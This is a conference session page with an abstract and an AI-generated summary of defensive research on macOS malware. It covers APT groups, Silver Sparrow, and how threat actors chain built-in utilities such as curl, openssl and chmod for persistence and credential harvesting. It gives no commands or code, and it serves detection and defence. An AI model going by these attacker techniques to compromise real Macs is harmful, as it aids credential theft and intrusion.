Presentation Material
Abstract
Ever since its inception, the Apple ecosystem has witnessed a remarkable three-decade journey proving its pedigree. During this period, the security industry has also witnessed a growing plethora of malware targeting different versions of macOS operating systems.
This session will take a shift-left approach to identifying a needle in the haystack: How to think like a threat actor attacking macOS endpoints. Using the data ingested in our threat intelligence systems and two years of extensive research, we shed light on the built-in macOS utilities that are used or have the potential of being used by threat actors in their attack kill chain. With the increase in work-from-home policies, the attendees will learn how to identify suspicious activity on the increasingly popular macOS platform.
AI Generated Summary
This research examined the macOS malware landscape and detection technologies from a defensive security perspective. The analysis revealed that while macOS malware is less prevalent than Windows threats, there has been a notable increase in cross-platform APT groups targeting macOS systems. Groups like Lazarus, Wild Pressure, and Iron Tiger have expanded from primarily Windows-focused operations to include macOS targets. The Silver Sparrow malware represented a significant milestone as the first malware specifically targeting Apple’s M1 chip architecture.
The research identified key trends in macOS threats, including increased use of “living off the land” techniques where attackers leverage legitimate system utilities rather than custom malware. Common commodity malware families like Slayer and bundler dominated infections, with Slayer using fraudulent update mechanisms and system utilities like mktemp, curl, openssl, and chmod to execute malicious activities.
The study demonstrated how process behavior-based detection using correlation techniques can identify malicious activity patterns. By analyzing sequences of legitimate utility usage through frameworks like MITRE ATT&CK, defenders can distinguish between benign and malicious activities. The research highlighted OSQuery as a powerful cross-platform tool for endpoint monitoring and detection on macOS systems.
Case studies of malware families (Slayer, XCSSET, Silver Sparrow) and offensive tools (Bella, Lazagne) showed how attackers chain together legitimate macOS utilities to achieve persistence, credential harvesting, and system compromise while evading traditional signature-based detection methods.